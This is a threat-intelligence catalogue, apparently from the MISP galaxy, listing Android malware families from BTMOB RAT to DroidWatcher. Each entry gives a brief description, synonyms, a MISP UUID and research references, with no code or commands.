- https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BTMOB RAT
According to Cyble, this is an advanced Android malware evolved from SpySolr that features remote control, credential theft, and data exfiltration. It spreads via phishing sites impersonating streaming services like iNat TV and fake mining platforms. The malware abuses Android’s Accessibility Service to unlock devices, log keystrokes, and automate credential theft through injections. It uses WebSocket-based C&C communication for real-time command execution and data theft. BTMOB RAT supports various malicious actions, including live screen sharing, file management, audio recording, and web injections.
Internal MISP references
UUID 3d244016-fa66-45ac-8f96-7ae7d158e931 which can be used as unique global reference for BTMOB RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BusyGasper
Internal MISP references
UUID 4bf68bf8-08e5-46f3-ade5-0bd4f124b168 which can be used as unique global reference for BusyGasper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CapraRAT
According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat (APT) group called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.
Internal MISP references
UUID 7cd1c5f3-7635-46d2-87f1-e638fb8d714c which can be used as unique global reference for CapraRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat - webarchive
- https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/ - webarchive
- https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/ - webarchive
- https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CarbonSteal
Internal MISP references
UUID 56090c0b-2b9b-4624-8eff-ef6d3632fd2b which can be used as unique global reference for CarbonSteal in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Catelites
Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim. The distribution vector seems to be fake apps from third-party app stores (not Google Play) or malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification telling the victim that they need to re-authenticate with Google Services and asks for their credit card details to be entered. Currently the malware has overlays for over 2,200 apps of banks and financial institutions.
Internal MISP references
UUID 2c672b27-bc65-48ba-ba3d-6318473e78b6 which can be used as unique global reference for Catelites in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cerberus
According to PCrisk, Cerberus is an Android banking Trojan which can be rented on hacker forums. It was created in 2019 and is used to steal sensitive, confidential information. Cerberus can also be used to send commands to users' devices and perform dangerous actions.
Internal MISP references
UUID c3a2448f-bb41-4201-b524-3ddcb02ddbf4 which can be used as unique global reference for Cerberus in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf - webarchive
- https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html - webarchive
- https://community.riskiq.com/article/85b3db8c - webarchive
- https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html - webarchive
- https://nur.pub/cerberus-analysis - webarchive
- https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/ - webarchive
- https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/ - webarchive
- https://securelist.com/the-state-of-stalkerware-in-2021/106193/ - webarchive
- https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html - webarchive
- https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/ - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://twitter.com/AndroidCerberus - webarchive
- https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/ - webarchive
- https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf - webarchive
- https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus - webarchive
- https://github.com/ics-iot-bootcamp/cerberus_research - webarchive
- https://cyberint.com/blog/research/cerberus-is-dead-long-live-cerberus/ - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chameleon
Chameleon is an Android trojan that pretends to be legitimate entities to steal data from users in Australia and Poland. It abuses the Accessibility Service to monitor and modify the device screen.
Internal MISP references
UUID 90b3a256-311d-416b-b333-e02b910ba75d which can be used as unique global reference for Chameleon in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.chameleon - webarchive
- https://www.threatfabric.com/blogs/android-banking-trojan-chameleon-is-back-in-action - webarchive
- https://www.threatfabric.com/blogs/chameleon-is-now-targeting-employees-masquerading-as-crm-app - webarchive
- https://blog.cyble.com/2023/04/13/chameleon-a-new-android-malware-spotted-in-the-wild/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chamois
Internal MISP references
UUID 2e230ff8-3971-4168-a966-176316cbdbf2 which can be used as unique global reference for Chamois in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois - webarchive
- https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/ - webarchive
- https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf - webarchive
- https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Charger
Internal MISP references
UUID 6e0545df-8df6-4990-971c-e96c4c60d561 which can be used as unique global reference for Charger in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger - webarchive
- http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf - webarchive
- http://blog.checkpoint.com/2017/01/24/charger-malware/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chinotto (Android)
Internal MISP references
UUID 6cc7b402-21cf-4510-be7d-d7f811a57bc1 which can be used as unique global reference for Chinotto (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chrysaor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chrysaor.
| Known Synonyms |
|---|
| JigglyPuff |
| Pegasus |
Internal MISP references
UUID 52acea22-7d88-433c-99e6-8fef1657e3ad which can be used as unique global reference for Chrysaor in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor - webarchive
- https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/ - webarchive
- https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html - webarchive
- https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf - webarchive
- https://twitter.com/billmarczak/status/1416801439402262529 - webarchive
- https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html - webarchive
- https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying - webarchive
- https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/ - webarchive
- https://zetter.substack.com/p/pegasus-spyware-how-it-works-and - webarchive
- https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/ - webarchive
- https://therecord.media/mexican-army-spyware - webarchive
- https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/ - webarchive
- https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html - webarchive
- https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/ - webarchive
- https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso - webarchive
- https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus - webarchive
- https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5 - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1 - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/ - webarchive
- https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/ - webarchive
- https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/ - webarchive
- https://www.iverify.io/post/clipping-wings-our-analysis-of-a-pegasus-spyware-sample - webarchive
- https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages - webarchive
- https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html - webarchive
- https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat - webarchive
- https://www.theguardian.com/news/series/pegasus-project - webarchive
- https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus - webarchive
- https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/ - webarchive
- https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/ - webarchive
- https://nex.sx/blog/2021/08/03/the-pegasus-project.html - webarchive
- https://citizenlab.ca/2021/07/amnesty-peer-review/ - webarchive
- https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/ - webarchive
- https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/ - webarchive
- https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/ - webarchive
- https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html - webarchive
- https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests - webarchive
- https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/ - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/ - webarchive
- https://thewire.in/tag/pegasus-project - webarchive
- https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ - webarchive
- https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/ - webarchive
- https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/ - webarchive
- https://irpimedia.irpi.eu/sorveglianze-cy4gate/ - webarchive
- https://media.ccc.de/v/33c3-7901-pegasus_internals - webarchive
- https://objective-see.com/blog/blog_0x67.html - webarchive
- https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure - webarchive
- https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/ - webarchive
- https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto - webarchive
- https://thewire.in/media/pegasus-project-spyware-indian-journalists - webarchive
- https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html - webarchive
- https://twitter.com/HackSysTeam/status/1418223814387765258?s=20 - webarchive
- https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/ - webarchive
- https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/ - webarchive
- https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/ - webarchive
- https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/ - webarchive
- https://forbiddenstories.org/about-the-pegasus-project/ - webarchive
- https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/ - webarchive
- https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/ - webarchive
- https://twitter.com/alexanderjaeger/status/1417447732030189569 - webarchive
- https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/ - webarchive
- https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/ - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/ - webarchive
- https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/ - webarchive
- https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/ - webarchive
- https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Clientor
Internal MISP references
UUID c0a48ca3-682d-45bc-805c-e62aecd4c724 which can be used as unique global reference for Clientor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Clipper
Internal MISP references
UUID ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e which can be used as unique global reference for Clipper in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper - webarchive
- https://news.drweb.com/show?lng=en&i=12739 - webarchive
- https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html - webarchive
- https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/ - webarchive
- https://web.archive.org/web/20201107225915/https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CloudAtlas
Internal MISP references
UUID ed780667-b67c-4e17-ab43-db1b7e018e66 which can be used as unique global reference for CloudAtlas in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CometBot
Internal MISP references
UUID 151bf399-aa8f-4160-b9b5-8fe222f2a6b1 which can be used as unique global reference for CometBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Connic
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Connic.
| Known Synonyms |
|---|
| SpyBanker |
Internal MISP references
UUID 93b1c63a-4a34-44fd-805b-0a3470ff7e6a which can be used as unique global reference for Connic in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Coper
Coper is an Android banking trojan and RAT descended from ExobotCompact, itself a rewrite of Exobot. It uses a modular architecture, a multi-stage infection chain and (in some variants) a DGA. First observed in Colombia, it has since spread to Europe.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Coper.
| Known Synonyms |
|---|
| ExobotCompact |
| Octo |
Internal MISP references
UUID 70973ef7-e031-468f-9420-d8aa4eb7543a which can be used as unique global reference for Coper in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper - webarchive
- https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html - webarchive
- https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html - webarchive
- https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/ - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/11/TLP-CLEAR-PROSPERO-Proton66-Uncovering-the-links-between-bulletproof-networks.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.virusbulletin.com/conference/vb2024/abstracts/octopus-prime-didnt-turn-truck-widely-spread-android-botnet/ - webarchive
- https://www.domaintools.com/resources/blog/uncovering-octo2-domains/ - webarchive
- https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html - webarchive
- https://blog.cyble.com/2022/03/24/coper-banking-trojan/ - webarchive
- https://labs.k7computing.com/index.php/play-store-app-serves-coper-via-github/ - webarchive
- https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0 - webarchive
- https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-january-to-june-2025/ - webarchive
- https://labs.k7computing.com/index.php/android-banking-trojan-octov2-masquerading-as-deepseek-ai/ - webarchive
- https://x.com/cleafylabs/status/1833145006585987374 - webarchive
- https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/ - webarchive
- https://www.team-cymru.com/post/coper-octo-a-conductor-for-mobile-mayhem-with-eight-limbs - webarchive
- https://www.threatfabric.com/blogs/octo2-european-banks-already-under-attack-by-new-malware-variant - webarchive
- https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/ - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://www.intrinsec.com/prospero-proton66-tracing-uncovering-the-links-between-bulletproof-networks/ - webarchive
- https://twitter.com/icebre4ker/status/1541875982684094465 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jul-Dec%202024%20Botnet%20Threat%20Update.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Copybara
Internal MISP references
UUID e3d07fda-d29d-42e4-a0d6-5827b2d14d17 which can be used as unique global reference for Copybara in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.copybara - webarchive
- https://www.cleafy.com/cleafy-labs/on-device-fraud-on-the-rise-exposing-a-recent-copybara-fraud-campaign - webarchive
- https://www.threatfabric.com/blogs/brata-a-tale-of-three-families - webarchive
- https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html - webarchive
- https://www.threatfabric.com/blogs/toad-fraud - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-copybara - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Coronavirus Android Worm
Poses as an app that offers a "corona safety mask", but instead reads the phone's address book and sends SMS messages to the contacts, spreading its own download link.
Internal MISP references
UUID f041032e-01af-4e66-9fb2-f8da88a6ea35 which can be used as unique global reference for Coronavirus Android Worm in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm - webarchive
- https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html - webarchive
- https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cpuminer (Android)
Internal MISP references
UUID 8a42a699-1746-498b-a558-e7113bb916c0 which can be used as unique global reference for Cpuminer (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CraxsRAT
Internal MISP references
UUID 1f7a8a57-f3e2-4e4b-a4d7-8eb0ba9243c5 which can be used as unique global reference for CraxsRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.craxs_rat - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives?hl=en - webarchive
- https://cocomelonc.github.io/book/2025/05/19/aiya-mmd-book.html - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives - webarchive
- https://www.group-ib.com/blog/craxs-rat-malware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Crocodilus
According to ThreatFabric, this malware offers remote control, black screen overlays, and advanced data harvesting via accessibility logging.
Internal MISP references
UUID a2b69930-86ad-47ab-a8a1-1601f30b7f0d which can be used as unique global reference for Crocodilus in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.crocodilus - webarchive
- https://medium.com/@mvaks/bombardino-crocodilo-in-poland-analysis-of-iko-lokaty-mobile-malware-campaign-502bd74947f3 - webarchive
- https://www.threatfabric.com/blogs/crocodilus-mobile-malware-evolving-fast-going-global - webarchive
- https://www.threatfabric.com/blogs/exposing-crocodilus-new-device-takeover-malware-targeting-android-devices - webarchive
- https://medium.com/@mvaks/crocodilus-in-the-wild-mapping-the-campaign-in-poland-15d3078eb954 - webarchive
- https://shindan.io/blog/crocodilus-a-deep-dive-into-its-structure-and-capabilities - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CryCryptor
According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations. At the time of publication these websites have affected the Canadian health service. CryCryptor cannot be obtained from the Google Play store, so devices restricted to only running apps from the store are not affected.
When CryCryptor is run it encrypts common file types and saves a ransom note to every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to the filenames. Additional files are saved containing the salt values used in each encryption and an initialisation vector. These files have the extensions '.enc.salt' and '.enc.iv' respectively.
When files have been encrypted, a notification is displayed directing users to open the ransom note.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryCryptor.
| Known Synonyms |
|---|
| CryCrypter |
| CryDroid |
Internal MISP references
UUID 21e9d7e6-6e8c-49e4-8869-6bac249cda8a which can be used as unique global reference for CryCryptor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CyberAzov
Internal MISP references
UUID bb1821f9-eace-4e63-b55d-fc7821a6e5f1 which can be used as unique global reference for CyberAzov in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.cyber_azov - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/ - webarchive
- https://twitter.com/sekoia_io/status/1554086468104196096 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DAAM
According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.
Lookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DAAM.
| Known Synonyms |
|---|
| BouldSpy |
Internal MISP references
UUID 37a3b62e-99da-47d7-81fb-78f745427b16 which can be used as unique global reference for DAAM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dark Shades
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark Shades.
| Known Synonyms |
|---|
| Rogue |
Internal MISP references
UUID 97fe35c9-f50c-495f-8736-0ecd95c70192 which can be used as unique global reference for Dark Shades in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DawDropper
Internal MISP references
UUID bd9756da-220d-48d6-a4f5-6646558c4b30 which can be used as unique global reference for DawDropper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DEFENSOR ID
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEFENSOR ID.
| Known Synonyms |
|---|
| Defensor Digital |
Internal MISP references
UUID 76346e4d-d14e-467b-9409-82b28a4d6cd6 which can be used as unique global reference for DEFENSOR ID in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id - webarchive
- https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dendroid
Internal MISP references
UUID 89989df2-e8bc-4074-a8a2-130a15d6625f which can be used as unique global reference for Dendroid in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid - webarchive
- https://cocomelonc.github.io/book/2025/05/19/aiya-mmd-book.html - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DHCSpy
According to Lookout, DCHSpy is an Android surveillanceware tool leveraged by Iranian cyber espionage group MuddyWater. DCHSpy collects WhatsApp data, accounts, contacts, SMS, files, location, and call logs, and can record audio and take photos.
Internal MISP references
UUID d70da110-3e0d-475d-8dd2-d8614f07a3ae which can be used as unique global reference for DHCSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
dmsSpy
Internal MISP references
UUID 72a25832-4bf4-4505-a77d-8c0fc52dc85d which can be used as unique global reference for dmsSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy - webarchive
- https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf - webarchive
- https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DoubleAgent
Internal MISP references
UUID 73fd1bda-e4aa-4777-a628-07580bc070f4 which can be used as unique global reference for DoubleAgent in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DoubleLocker
Internal MISP references
UUID 10d0115a-00b4-414e-972b-8320a2bb873c which can be used as unique global reference for DoubleLocker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dracarys
Android malware that impersonates genuine applications such as Signal, Telegram, WhatsApp, YouTube, and other chat applications and distributes through phishing sites.
Internal MISP references
UUID bf94eee6-2274-40f4-b181-2b49ce6ef9fb which can be used as unique global reference for Dracarys in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DragonEgg
Android variant of ios.LightSpy.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DragonEgg.
| Known Synonyms |
|---|
| LightSpy |
Internal MISP references
UUID 4ef28f14-17f4-4f87-a292-e63b42027c8c which can be used as unique global reference for DragonEgg in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DroidBot
According to Cleafy, DroidBot is a modern RAT that combines hidden VNC and overlay attack techniques with spyware-like capabilities, such as keylogging and user interface monitoring. Moreover, it leverages dual-channel communication, transmitting outbound data through MQTT and receiving inbound commands via HTTPS, providing enhanced operation flexibility and resilience.
Internal MISP references
UUID 1e0562cd-981a-4b81-b813-9a59fff6fb71 which can be used as unique global reference for DroidBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DroidJack
Internal MISP references
UUID 8990cec7-ddd8-435e-97d6-5b36778e86fe which can be used as unique global reference for DroidJack in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DroidLock
According to Zimperium, DroidLock has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device.
It employs deceptive system update screens to trick victims and can stream and remotely control devices via VNC. The malware also exploits device administrator privileges to lock or erase data, capture the victim's image with the front camera, and silence the device. Overall, it utilizes 15 distinct commands to interact with its C2 panel.
Internal MISP references
UUID 2f3b54fe-6a17-4584-a6bb-ebcdb755624d which can be used as unique global reference for DroidLock in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DroidWatcher
Internal MISP references
UUID 15f3e50b-9fa5-4eab-ac2b-928e9ce03b72 which can be used as unique global reference for DroidWatcher in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidwatcher - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf - webarchive
